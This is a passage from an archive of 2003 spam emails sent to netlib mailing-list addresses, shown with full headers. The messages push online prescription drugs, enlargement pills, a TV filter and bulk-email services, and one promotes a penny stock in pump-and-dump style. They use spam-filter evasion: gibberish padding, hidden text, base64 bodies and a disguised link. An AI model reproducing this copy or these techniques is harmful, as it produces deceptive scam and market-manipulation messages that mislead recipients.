cj48L3RhYmxlPjwvdGQ+PC90cj48L3RhYmxlPjwvZGl2Pg0KPC9ib2R5Pg0KPC9odG1sPg0K


From 80cpjyjwp@yahoo.com Mon Oct 13 05:13:02 2003
Return-Path: <80cpjyjwp@yahoo.com>
Received: from myl-c-24-159-177-250.chartertn.net (myl-c-24-159-177-250.chartertn.net [24.159.177.250])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9D9CpRY022572;
	Mon, 13 Oct 2003 05:12:52 -0400 (EDT)
Received: from [11.248.79.135] by myl-c-24-159-177-250.chartertn.net id <7178435-07561>; Mon, 13 Oct 2003 07:11:49 -0300
Message-ID: <c$9q6-$$--iz8-879@43su.8.d2h>
From: "Salvatore Mcmullen" <80cpjyjwp@yahoo.com>
Reply-To: "Salvatore Mcmullen" <80cpjyjwp@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Prescription Drugs Delivered Overnight   mpfn jtesni
Date: Mon, 13 Oct 03 07:11:49 GMT
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="317_3_8.EC89C1."
X-Priority: 3
X-MSMail-Priority: Normal


--317_3_8.EC89C1.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD>
</HEAD>
<BODY>
<DIV align=3Dcenter><FONT face=3DArial size=3D2><FONT face=3D"Times New Ro=
man" 
size=3D3>&nbsp;</FONT><FONT face=3D"Times New Roman" size=3D3><IMG 
height=3D91 src=3D"http://www.ohuisacentral.biz/rmtimages/top_img/img_02.g=
if" 
width=3D324></FONT></DIV>
<P align=3Dcenter><A href=3D"http://www.ohuisacentral.biz/vpr6653"><FONT 
face=3D"Times New Roman" size=3D3><IMG 
src=3D"http://www.ohuisacentral.biz/rmtimages/phentermine.gif?=
belgrade" 
border=3D0><IMG src=3D"http://www.ohuisacentral.biz/rmtimages/ambien.gif?=
dream" 
border=3D0><IMG src=3D"http://www.ohuisacentral.biz/rmtimages/soma.gif?=
instantiate" 
border=3D0></FONT></A></P>
<P align=3Dcenter><FONT lang=3D0 style=3D"BACKGROUND-COLOR: #ffffff"
face=3D=
Arial 
color=3D#0000ff size=3D1 FAMILY=3D"SANSSERIF" BACK=3D"#ffffff"><A 
href=3D"http://www.hotrx.net/remove">Blast-funct-archive</A></FONT></P></FONT></BODY>=
</HTML>jxpmqsdqro
wk
uwtoux lc iacwps fjsngaozvvx  ex

--317_3_8.EC89C1.--


From bdans@juno.com Mon Oct 13 09:36:10 2003
Return-Path: <bdans@juno.com>
Received: from ERIC-PERFECT (user-12hc80k.cable.mindspring.com [69.22.32.20])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9DDa9RY028743
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 13 Oct 2003 09:36:10 -0400 (EDT)
Message-Id: <200310131336.h9DDa9RY028743@netlib2.cs.utk.edu>
From: "bstelzer@yahoo.com" <bdans@juno.com>
To: "blast-funct-archive@netlib2.cs.utk.edu" <blast-funct-archive@netlib2.cs.utk.edu>
Subject: do penis pills really work?
Date: Mon, 13 Oct 2003 8:35:38 -0500
X-Priority: 3 (normal)
Importance: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6900 DM
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFs
Ly9FTiI+DQoNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+bmE8L3RpdGxlPg0KPC9oZWFkPg0KPGJv
ZHkgdG9wbWFyZ2luPSIwIiBiZ2NvbG9yPSIjMzMwMENDIj4NCjxkaXYgYWxpZ249ImNlbnRlciI+
PGJyPjxkbjdoNHM4b2w+DQo8dGFibGUgd2lkdGg9NTAwcHg+DQo8dHI+DQo8dGQgYmdjb2xvcj0i
bmF2eSIgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0idmVyZGFuYSIgc2l6ZT0yIGNvbG9yPSJ5
ZWxsb3ciPjEwMCUgR3VhcmFudGVlZCBSZXN1bHRzIE9yIFlvdXIgTW9uZXkgQmFjaw0KPC90cj4N
Cjx0cj48dGQgYmdjb2xvcj0iYmx1ZSIgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0idmVyZGFu
YSIgc2l6ZT00IGNvbG9yPSJ3aGl0ZSI+PGI+DQo8YnI+DQpXb3JyaWVkIHlvdXIgZ2lybGZyaWVu
ZCBpcyBsb29raW5nIGZvciBzb21lb25lIGVsc2UgYmVjYXVzZSB5b3UncmUgbGFja2luZyBkb3du
c3RhaXJzPzxicj48YnI+DQo8IS0tIGRuN2g0czhvbCAtLT4NCm5ldmVyIGJlIGFzaGFtZWQgaW4g
dGhlIG1lbnMgcm9vbSB1cmluYWxzIGFnYWluLi4gc2hvdyB0aGVtIHdobydzIGJvc3MhPGJyPjxi
cj4NClNlZSB0aGUgcmVzdWx0cyBpbiBhIG1heGltdW0gdGhyZWUgbW9udGggcGVyaW9kISBPdXIg
cGVuaXMgcGlsbHMgYXJlIHRoZSBtb3N0IEVGRkVDVElWRSBvbiB0aGUgbWFya2V0ITxicj48YnI+
DQo8QSBocmVmPSJodHRwOi8vaGFja2VyQHd3dy5oZXJiYWwtdXNhLnVzL3doaXRlbGluZS92cC8i
Pjxmb250IGNvbG9yPSJ5ZWxsb3ciPlRha2UgYSBsb29rIGF0IGhvdyBpdCB3b3JrczwvYT48YnI+
PGJyPg0KPC90ZD48L3RyPg0KPHRyPg0KPHRkIGJnY29sb3I9Im5hdnkiIGFsaWduPSJjZW50ZXIi
Pjxmb250IGZhY2U9InZlcmRhbmEiIHNpemU9MiBjb2xvcj0ieWVsbG93Ij5Xb3JsZHMgTW9zdCBF
ZmZlY3RpdmUgRW5sYXJnZW1lbnQgVGVjaG5pcXVlDQo8L3RyPg0KPC90YWJsZT48MjMxNHMyM2g+
DQo8YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPg0KPGZvbnQgc2l6ZT0iMXB4IiBmYWNl
PSJ2ZXJkYW5hIiBjb2xvcj0iIzAwMDAwIj4yMzE0czIzaCBkbjdoNHM4b2wgMjMxNHMyM2g8L2Zv
bnQ+DQo8MjMxNHMyM2g+DQo8YSBocmVmPSJodHRwOi8vaGFja2VyQHd3dy5oZXJiYWwtdXNhLnVz
L3doaXRlbGluZS9vdXQuaHRtbCI+PGZvbnQgY29sb3I9InllbGxvdyIgc2l6ZT0iMiI+dG8gZ2V0
IG9mZjwvYT4NCjwvYm9keT4NCjwvaHRtbD4NCg==


From on33xrip@yahoo.com Mon Oct 13 13:03:25 2003
Return-Path: <on33xrip@yahoo.com>
Received: from es222218038.user.veloxzone.com.br (ES222218038.user.veloxzone.com.br [200.222.218.38] (may be forged))
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9DH35RY003338;
	Mon, 13 Oct 2003 13:03:10 -0400 (EDT)
Message-ID: <xf6ox-3c81rvtk5sb0@rsrdm.mh>
From: "Opal Newsome" <on33xrip@yahoo.com>
Reply-To: "Opal Newsome" <on33xrip@yahoo.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: PROTECT YOUR CHILDREN From Offensive Language On Your TV With ProtecTV................... pb  u xstr
Date: Mon, 13 Oct 2003 18:52:37 +0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_5_CEF_17A270.A2.B"


--_5_CEF_17A270.A2.B
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<p>Protect Your Children With ProtecTV.<br>
<br>
ProtecTV gives you the power to remove the cursing and offensive <br>
language coming into your home through television and video.<br>
<br>
ProtecTV filters out more than 400 offensive words. <br>
ProtecTV's accuracy is virtually 100%. <br>
ProtecTV works with your TV, VCR, Satellite, Cable Box and DVD player. <br=
>
ProtecTV is easy to connect. <br>
<br>
Get ProtectTV Today - <a href=3D"http://www.coolbrands.net/protectv/">Just=
 Follow This Link</a></p><p>&nbsp;</p>
<p>If you wish to be excluded from future mailings -
<a href=3D"http://www.coolbrands.net/emailremovalmanagementcenter.htm">Go =
Here</a></p>
<br>
<br>
<br>
<br>
<br>caon cnvxnhp u  g bhfi liytfvedym uwt rmm

--_5_CEF_17A270.A2.B--


From jt65tfq@yahoo.com Mon Oct 13 21:54:50 2003
Return-Path: <jt65tfq@yahoo.com>
Received: from 12-217-27-82.client.mchsi.com (12-217-27-82.client.mchsi.com [12.217.27.82])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9E1sTRY013319;
	Mon, 13 Oct 2003 21:54:36 -0400 (EDT)
Received: from [2.23.178.121]
	by 12-217-27-82.client.mchsi.com id WpA66hvg7vc4;
	Tue, 14 Oct 2003 01:45:35 -0100
Message-ID: <21sm-$$-67l9z@xuj48.gc8.qw>
From: "Jeffry Greenwood" <jt65tfq@yahoo.com>
Reply-To: "Jeffry Greenwood" <jt65tfq@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Medications Precribed Online 24/7~ Need a Re-Fill On Your RX MEds? nngrhwqtvmgnwb
Date: Tue, 14 Oct 03 01:45:35 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="5CA_.B.A3.EDA"
X-Priority: 3
X-MSMail-Priority: Normal


--5CA_.B.A3.EDA
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD>
</HEAD>
<BODY>
<DIV align=3Dcenter><FONT face=3DArial size=3D2><FONT face=3D"Times New Ro=
man" 
size=3D3>&nbsp;</FONT><FONT face=3D"Times New Roman" size=3D3><IMG 
height=3D91 src=3D"http://www.extraohuisa.biz/rmtimages/top_img/img_02.gif=
" 
width=3D324></FONT></DIV>
<P align=3Dcenter><A href=3D"http://www.extraohuisa.biz/vpr6653"><FONT 
face=3D"Times New Roman" size=3D3><IMG 
src=3D"http://www.extraohuisa.biz/rmtimages/phentermine.gif?astarte" =

border=3D0><IMG src=3D"http://www.extraohuisa.biz/rmtimages/ambien.gif?=
shotbush" 
border=3D0><IMG src=3D"http://www.extraohuisa.biz/rmtimages/soma.gif?=
shortcut" 
border=3D0></FONT></A></P>
<P align=3Dcenter><FONT lang=3D0 style=3D"BACKGROUND-COLOR: #ffffff"
face=3D=
Arial 
color=3D#0000ff size=3D1 FAMILY=3D"SANSSERIF" BACK=3D"#ffffff"><A 
href=3D"http://www.hotrx.net/remove">Blast-funct-archive</A></FONT></P></FONT></BODY>=
</HTML>csmbd nluhy b
yghsegom  muaymxfbcgvzrojrk d

--5CA_.B.A3.EDA--


From vjy492@yahoo.com Tue Oct 14 02:07:10 2003
Return-Path: <vjy492@yahoo.com>
Received: from HOME-CX3B5LZK33 (IbLa536@public1-lewi1-5-cust202.lond.broadband.ntl.com [80.2.82.202])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9E677RY018604;
	Tue, 14 Oct 2003 02:07:08 -0400 (EDT)
Received: from [229.41.213.135] by HOME-CX3B5LZK33 id <9909719-57529>; Tue, 14 Oct 2003 06:03:58 -0100
Message-ID: <t-0d9m-2-7159o$24an17qy6@5lh1.ee4.0y>
From: "Hester Walls" <vjy492@yahoo.com>
Reply-To: "Hester Walls" <vjy492@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Ever wanted some ADIPEX?  p
Date: Tue, 14 Oct 03 06:03:58 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="B89..0_F__5._.5FD5C"
X-Priority: 3
X-MSMail-Priority: Normal


--B89..0_F__5._.5FD5C
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD>
</HEAD>
<BODY>
<DIV align=3Dcenter><FONT face=3DArial size=3D2><FONT face=3D"Times New Ro=
man" 
size=3D3>&nbsp;</FONT><FONT face=3D"Times New Roman" size=3D3><IMG 
height=3D91 src=3D"http://www.iohuisa.biz/rmtimages/top_img/img_02.gif" 
width=3D324></FONT></DIV>
<P align=3Dcenter><A href=3D"http://www.iohuisa.biz/vpr6653"><FONT 
face=3D"Times New Roman" size=3D3><IMG 
src=3D"http://www.iohuisa.biz/rmtimages/phentermine.gif?buchanan" 
border=3D0><IMG src=3D"http://www.iohuisa.biz/rmtimages/ambien.gif?=
fusion" 
border=3D0><IMG src=3D"http://www.iohuisa.biz/rmtimages/soma.gif?=
embed" 
border=3D0></FONT></A></P>
<P align=3Dcenter><FONT lang=3D0 style=3D"BACKGROUND-COLOR: #ffffff"
face=3D=
Arial 
color=3D#0000ff size=3D1 FAMILY=3D"SANSSERIF" BACK=3D"#ffffff"><A 
href=3D"http://www.hotrx.net/remove">Blast-funct-archive</A></FONT></P></FONT></BODY>=
</HTML>amvv llgic

--B89..0_F__5._.5FD5C--


From get_hung1692@yepmail.net Tue Oct 14 09:00:21 2003
Return-Path: <get_hung1692@yepmail.net>
Received: from mail501.nifty.com (mail501.nifty.com [202.248.37.209])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h9ED0KRY001116;
	Tue, 14 Oct 2003 09:00:20 -0400 (EDT)
Received: from blasko (eatkyo215159.adsl.ppp.infoweb.ne.jp [218.226.144.159])by mail501.nifty.com with SMTP id h9ECxWt3017425;
	Tue, 14 Oct 2003 21:59:32 +0900
Date: Tue, 14 Oct 2003 21:59:32 +0900
Message-Id: <200310141259.h9ECxWt3017425@mail501.nifty.com>
From: get_hung1692@yepmail.net
To: blasko@yepmail.net
Subject: Want to be well hung ... like the P0rnstars,   cuemv
MIME-Version: 1.0
Content-type: text/html

<HTML>
<BODY>
<CENTER><H2>New Medica1 Breakthrough</H2></CENTER>
<p>
Want to be well hung like all the P0rnstars are?<br>
Want all the ladies wanting you?<br>
Of course you do, introducing the new "PEN1S ENLARGEMENT PATCH"<br>
1-4 months just wearing a patch everyday will make you WELL HUNG! 3-4 inches more..<br>
<p>
Smoking patches helped people stop smoking..<br>
Diet patches helped people keep the pounds off...<br>
Now this new breakthrough in science is helping men worldwide..<br>
<p>
<A HREF="http://gclkirpu.cuntz.us/duster/magnapatch.html">Read more info here</A>
<p><br>
<p><br>
<p><br>
<p>
<p>
<A HREF="http://meinje.cuntz.us/duster/out.html">Get me off this list</A><br>
<p>
<p>
korsvr , cjdnhjv , jmydjoge
</BODY>
</HTML>



From dxwrshm44a@yahoo.com Tue Oct 14 15:13:23 2003
Return-Path: <dxwrshm44a@yahoo.com>
Received: from cmb21-174.dial-up.arnes.si (cmb21-174.dial-up.arnes.si [194.249.31.174])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9EJCcRY009174;
	Tue, 14 Oct 2003 15:12:41 -0400 (EDT)
Message-ID: <wp615q2gdr$0ld0old88d@w5u6.c.qs>
From: "Jared Rocha" <dxwrshm44a@yahoo.com>
Reply-To: "Jared Rocha" <dxwrshm44a@yahoo.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: PROTECT YOUR CHILDREN From Offensive Language On Your TV With ProtecTV................... ylcf aef jq  wu
Date: Tue, 14 Oct 2003 22:02:39 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="8_0D1F._2_ACC96B35"


--8_0D1F._2_ACC96B35
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<p align=3D"center"><font size=3D"7"><i>UpSide</i></font><i><font size=3D"=
7"> 
International</font></i></p><p align=3D"center">
Our last pick SUQU went from $0.45 to $1.18 -
<a
href=3D"http://table.finance.yahoo.com/d?a=3D7&b=3D28&c=3D2003&d=3D8&e=3D=
18&f=3D2003&g=3Dd&s=3Dsuqu.ob">
SEE HISTORICAL PRICES</a></p><p align=3D"center">Our NEW PICK is True Heal=
th, Inc. - <b>
TRHL</b></p><p>True Health, Inc.: <b>TRHL -
<a href=3D"http://moneycentral.msn.com/scripts/webquote.dll?iPage=3Dqd&Sym=
bol=3Dtrhl">
GET QUOTE</a></b><br>
Industry: Healthcare<br>
12-month range: $0.55-3.90&nbsp; -&nbsp; <i>SUQU went back to its previous=
 high 
of $1.18, we believe <b>TRHL</b> can too - to its previous high of $3.90</=
i></p><p><font color=3D"#FF0000"><b><i>BREAKING NEWS</i></b></font> 
- <span class=3D"t"><i>PR Newswire-First Call</i> - True Health Announces =
the 
Appointment of Ian Wylie as Chief Financial Officer - Mr. Wylie has held t=
he 
position of </span>Corporate Finance Manager at DEL MONTE FOODS INTERNATIO=
NAL.&nbsp; 
Del Monte Foods Co. (NYSE: DLM) posted net sales of&nbsp; $2.171 billion f=
or 
fiscal 2003.&nbsp; Mr. Wylie also held the same position at Countrywide As=
sured 
Group PLC, which included the oversight of 350 million pounds sterling ($5=
80 
million US).&nbsp; Just prior to this announcement, Mr. Wylie was the Dire=
ctor 
of Town &amp; Country Housing Group where he was responsible for the devel=
opment of 
the company's growth strategies and overseeing an asset portfolio of 400 m=
illion 
pounds sterling ($665 million US).</p><p>At <i>UpSide International</i> we=
 search out stocks with big upside potential that 
have gone unnoticed until now.<br>
<br>
Our focus this week is on True Health, Inc.: <b>TRHL - with revenues up by=
 more 
than 412%</b><br>
<br>
We are now seeing indicators with <b>TRHL</b>, <i>the 20 - 50 Day MACD Osc=
illator</i> is now 
indicating a buy, <i>20 Day Bollinger Bands</i> have moved into a buy indi=
cation.<br>
<br>
<u><b><font size=3D"4">The Story</font></b></u><br>
<br>
<b>The Problem</b><br>
<br>
The US and international healthcare industry are currently in a major cris=
is. 
There is a huge shortage of skilled healthcare specialists, doctors and nu=
rses, 
and since 9/11, many qualified professionals are finding it impossible to =

immigrate into countries desperately needing medical personnel. </p><p>
<a href=3D"http://www.audit.wa.gov.au/reports/report2002_03.html">A Critic=
al 
Resource: Nursing Shortages and the Use of Agency Nurses - Report No. 3- A=
ugust 
2002</a><br>
<br>
<b>The Solution</b><br>
<br>
True Health Incorporated is a full service specialist, medical equipment a=
nd 
medical professional supplier to the healthcare industry. Its primary clie=
nts 
are Great Britain's National Health Service (NHS), BUPA International and =
the 
private Nursing Home Industry. The Company also delivers recruitment servi=
ces to 
the NHS; specializing in the provision of locum radiographers and nurses.<=
br>
<br>
<u><b><font size=3D"4">Read Just Some of the Press</font></b></u><br>
<br>
<b>MD, nurse shortages reaching crisis levels</b><br>
<br>
WASHINGTON, (UPI) -- Shortages of surgeons, pharmacists and nurses in hosp=
itals 
across the United States are reaching crisis levels and may worsen over th=
e next 
several years, health care experts warned.<br>
<br>
The nursing shortage -- more than 126,000 positions currently remain unfil=
led -- 
has become so severe it is endangering the lives of patients and is a prim=
ary 
reason for overcrowding in emergency departments and cancellation of surge=
ries, 
according to a report by an Experts Roundtable panel convened by the Joint=
 
Commission on the Accreditation of Healthcare Organizations.<br>
<br>
The Society for Thoracic Surgeons recently warned that a shortage of heart=
 
surgeons looms within a few years and a survey of hospitals found pharmaci=
sts, 
X-ray technicians and therapists are leaving at such an alarming rate it a=
lready 
is impacting the quality of care patients receive.</p><p>
<a href=3D"http://www.ama.com.au/web.nsf/doc/WEEN-5NV24W">Doctor Shortages=
 - a 
looming major social problem for Australia - AMA submission to the Senate =
Select 
Committee on Medicare</a><br>
<br>
<b>Johnson Co-Sponsors Legislation to Address Nurse Shortages</b><br>
<br>
January 24, 2003 Washington, DC- U.S. Senator Tim Johnson (D-SD) recently =

co-sponsored the Nurse Reinvestment Act to address areas with critical nur=
se 
shortages in an effort to provide more opportunities to recruit and retain=
 
quality nurses. &quot;Our national health care system has many problems th=
at need to 
be addressed,&quot; Johnson said. &quot;At the top of that list is the sev=
ere shortage of 
nurses.</p><p>
<a href=3D"http://johnson.senate.gov/~johnson/releases/200301/2003124B11.h=
tml">
Johnson Co-Sponsors Legislation to Address Nurse Shortages</a></p><p><b>Co=
llege of Family Physicians of Canada</b><br>
<br>
Past decisions with respect to health care =93reform=94 have been made wit=
hout 
complete or accurate information, and this has led to critical problems in=
 the 
system such as doctor shortages and waiting lists. <br>
<br>
<b>Texas Public Policy Foundation<br>
Check with Your Doctor First! September 03, 2003<br>
Texans Can Cure State's Medical Crisis<br>
</b>
<br>
Getting a second opinion is always a good idea, particularly when you have=
 a 
serious medical problem. Today, Texans are suffering from a serious lack o=
f 
medical care. The American Medical Association says the physician shortage=
 has 
reached crisis proportions in Texas and lives are in peril.</p><p>
<a
href=3D"http://www.texaspolicy.com/press_releases_single.php?report_id=3D=
372">
Texans Can Cure State's Medical Crisis - TexasPolicy.com</a><br>
<br>
<b><u><font size=3D"4">True Health's Subsidiary- Westmeria</font></u></b><=
br>
<br>
True Health through its wholly owned subsidiary, Westmeria for 20 years ha=
s 
developed a reputation for getting medical personnel in where they are nee=
ded 
fast. Now with demand for these professionals escalating at an exponential=
 rate, 
the demand for Westmeria is growing fast. Westmeria is now set-up to place=
 
thousands of doctors and nurses to help solve the worldwide crisis. This w=
ill 
equate to many millions in added revenues for True Health. Check out the l=
atest 
financial report.<br>
<br>
<u><b><font size=3D"4">Financials<br>
</font></b></u>
<br>
According to the latest financials, <b>revenues are up by more than 412=
%</b><br>
<br>
<u><b><i>Sep-2003 Quarterly Report</i></b></u><br>
<br>
Revenue for the three months ended July 31, 2003 increased by 412.8=
%, when 
compared to revenue for the three months ended July 31, 2002.<br>
<br>
The equipment rentals and sales segment's revenue increased by 69.8=
%, in the 
three months ended July 31, 2003, compared to the three months ended July =
31, 
2002. This increase reflects the growth in the business over the past year=
 
brought about by an increase in the customer base.</p><p><u><b><font
size=3D=
"4">
Additional Sources</font></b></u></p><p>
<a href=3D"http://www.doctoroncall.com/NewsRelease/HealthCareCrisis.html">=
National 
Physician Hotline Responds to Health Care Crisis</a></p><p><font face=3D"T=
imes">
<a href=3D"http://www.caymannetnews.com/Archive/Archive%20Articles/August=
%202002/Issue%20228/MD%20Nurs%20Shortages.html">
MD, nurse shortages reaching crisis levels</a></font></p><p>
<font face=3D"Times New Roman,Times">
<a href=3D"http://www.dnews.com/health/hc5.htm">Recruitment a constant str=
uggle; 
Universities help, but finding and keeping needed medical professionals ne=
ver 
easy</a></font></p><p>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>epgwpxc azgz  f dhny kpqd cjda
ttscp 
qkr
l kmacklcg witkbx
ytv bnue llr 
fl qvhrwpwg
zmp

--8_0D1F._2_ACC96B35--


From o42vkrynj@artois.fr Wed Oct 15 07:47:57 2003
Return-Path: <o42vkrynj@artois.fr>
Received: from 160.36.58.108 ([211.251.141.193])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9FBljRY001274;
	Wed, 15 Oct 2003 07:47:48 -0400 (EDT)
Received: from [123.22.118.70] by 160.36.58.108 with ESMTP id 78ECBE6FEF7 for <blast-comm-archive@netlib2.cs.utk.edu>; Wed, 15 Oct 2003 05:41:21 -0700
Message-ID: <bfc0$wq$94t8116wf5@sp5.f.l7yw>
From: "Erma Crum" <o42vkrynj@artois.fr>
Reply-To: "Erma Crum" <o42vkrynj@artois.fr>
To: <blast-comm-archive@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>, <netlibd@netlib2.cs.utk.edu>
Subject: ADVERTISE TO MILLIONS vwffpzbgvtlm w  znji
Date: Wed, 15 Oct 03 05:41:21 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="A8FC0.F9_D"
X-Priority: 3
X-MSMail-Priority: Normal


--A8FC0.F9_D
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>blast-comm-archive@netlib2.cs.utk.edu</title>
</head>
<body>

<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D15 WIDTH=3D"750" HEIGH=
T=3D"400" BGCOLOR=3D"#3333FF" >
<tr>
<td VALIGN=3DTOP>
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"700" HEIGHT=
=3D"60" BGCOLOR=3D"#000000" >
<tr>
<td>
&nbsp;
<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"600" HE=
IGHT=3D"30" BGCOLOR=3D"#FF0000" >
<tr>
<td>
<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"100=
%" HEIGHT=3D"100%" BGCOLOR=3D"#FFFF00" >
<tr>
<td>
<center><b><font face=3D"Arial,Helvetica"><font size=3D+3>EXPLODE! <i>Your=
 Profits</i></font></font></b></center>
</td>
</tr>
</table></center>
</td>
</tr>
</table></center>

<center>
<p><b><font face=3D"Arial,Helvetica"><font color=3D"#FFFFFF"><font size=3D=
+3>EMAIL MARKETING WORKS</font></font></font></b></center>
<br>&nbsp;
<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 WIDTH=3D"500" HE=
IGHT=3D"250" BGCOLOR=3D"#000000" >
<tr>
<td ALIGN=3DCENTER VALIGN=3DTOP>
<table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D10 COLS=3D1 WIDTH=3D"600" =
HEIGHT=3D"95%" BGCOLOR=3D"#FFFFFF" >
<tr>
<td><b><i><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font siz=
e=3D+1>Would Email Marketing Work For You?</font></font></font></i></b>
<ul>
<li>
<b><font face=3D"Arial,Helvetica"><font size=3D-1>Do You Sell A Product Or=
 Service?</font></font></b></li>

<li>
<b><font face=3D"Arial,Helvetica"><font size=3D-1>Are You Able To Fulfill =
This Product Or Svc To A National Or Internatl Market Base?</font></font><=
/b></li>

<li>
<b><font face=3D"Arial,Helvetica"><font size=3D-1>Can Your Company Use Mor=
e Sales Or Leads Than You Are Currently Getting?</font></font></b></li>
</ul>

<center><b><i><font face=3D"Arial,Helvetica"><font size=3D+1>If you answer=
ed yes to the above questions,</font></font></i></b>
<br><b><i><font face=3D"Arial,Helvetica"><font size=3D+1>Email Marketing w=
ill explode your profits.</font></font></i></b>
<br>&nbsp;
<br><b><i><font face=3D"Arial,Helvetica"><font size=3D-1><font color=3D"#3=
333FF">PRICING FROM $62.50 PER MILLION - THE LOWEST RATES IN THE INDUSTRY<=
/font></font></font></i></b>
</center>

<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 WIDTH=3D"98=
%" >
<tr>
<td WIDTH=3D"60%"><b><font face=3D"Arial,Helvetica"><font size=3D-1><font =
color=3D"#FF0000">=3D>
</font><font color=3D"#000000">ONE MILLION MAILS SENT</font></font></font>=
</b></td>

<td ALIGN=3DLEFT WIDTH=3D"25%"><b><font face=3D"Arial,Helvetica"><font siz=
e=3D-1>1 Million Delivered!</font></font></b></td>

<td ALIGN=3DRIGHT WIDTH=3D"15%">
<div align=3Dright><b><font face=3D"Arial,Helvetica"><font size=3D-1>$250.=
00</font></font></b></div>
</td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica"><font size=3D-1><font color=3D"#FF00=
00">=3D>
</font><font color=3D"#000000">DEDICATED MAILING SERVER - 1 Week</font></f=
ont></font></b></td>

<td><b><font face=3D"Arial,Helvetica"><font size=3D-1>8+ Million Delivered=
!</font></font></b></td>

<td ALIGN=3DRIGHT><b><font face=3D"Arial,Helvetica"><font size=3D-1>$750.0=
0</font></font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica"><font size=3D-1><font color=3D"#FF00=
00">=3D>
</font><font color=3D"#000000">DEDICATED MAILING SERVER - 1 Month</font></=
font><font color=3D"#000000">
</font><font color=3D"#FF0000"><font size=3D-2>**See Spl</font></font></fo=
nt></b></td>

<td><b><font face=3D"Arial,Helvetica"><font size=3D-1>32+ Million Delivere=
d!</font></font></b></td>

<td ALIGN=3DRIGHT><b><font face=3D"Arial,Helvetica"><font size=3D-1>$2,000=
00</font></font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica"><font size=3D-1><font color=3D"#FF00=
00">=3D>
</font>BULK HOSTING OF YOUR WEBSITE</font></font></b></td>

<td><b><font face=3D"Arial,Helvetica"><font size=3D-1>30 Days of Service</=
font></font></b></td>

<td ALIGN=3DRIGHT><b><font face=3D"Arial,Helvetica"><font size=3D-1>$850.0=
